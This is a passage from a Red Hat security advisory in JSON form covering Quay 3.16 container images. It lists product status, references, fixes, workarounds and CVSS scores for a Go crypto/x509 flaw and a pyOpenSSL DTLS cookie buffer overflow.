          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-27137"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445345",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445345"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-27137",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27137"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27137",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27137"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/752182",
          "url": "https://go.dev/cl/752182"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/77952",
          "url": "https://go.dev/issue/77952"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk",
          "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4599",
          "url": "https://pkg.go.dev/vuln/GO-2026-4599"
        }
      ],
      "release_date": "2026-03-06T21:28:13.748000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "crypto/x509: Incorrect enforcement of email constraints in crypto/x509"
    },
    {
      "cve": "CVE-2026-27459",
      "cwe": {
        "id": "CWE-120",
        "name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
      },
      "discovery_date": "2026-03-18T00:01:41.404915+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2448503"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in pyOpenSSL. The set_cookie_generate_callback callback function can be used to generate DTLS cookies. When the callback returns a cookie string or byte sequence longer than 256 bytes, a buffer overflow can be triggered due to a missing bounds checking before copying the data to a fixed-size buffer provided by the underlying OpenSSL library.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "pyOpenSSL: DTLS cookie callback buffer overflow",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw is only exploitable when an application using the pyOpenSSL library provides a custom callback to the set_cookie_generate_callback function. For the buffer overflow to occur, the callback function must return a cookie string or byte sequence longer than 256 bytes, limiting the exposure of this issue. Due to these reasons, this vulnerability has been rated with an important severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-27459"
        },
        {
          "category": "external",
          "summary": "RHBZ#2448503",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448503"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-27459",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27459"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27459",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27459"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/pyopenssl/blob/358cbf29c4e364c59930e53a270116249581eaa3/CHANGELOG.rst",
          "url": "https://github.com/pyca/pyopenssl/blob/358cbf29c4e364c59930e53a270116249581eaa3/CHANGELOG.rst"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/pyopenssl/commit/57f09bb4bb051d3bc2a1abd36e9525313d5cd408",
          "url": "https://github.com/pyca/pyopenssl/commit/57f09bb4bb051d3bc2a1abd36e9525313d5cd408"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/pyopenssl/security/advisories/GHSA-5pwr-322w-8jr4",
          "url": "https://github.com/pyca/pyopenssl/security/advisories/GHSA-5pwr-322w-8jr4"
        }
      ],
      "release_date": "2026-03-17T23:34:28.483000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "To mitigate this flaw, ensure the callback provided to the set_cookie_generate_callback function strictly limits the returned cookie string or byte sequence to under 256 bytes.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
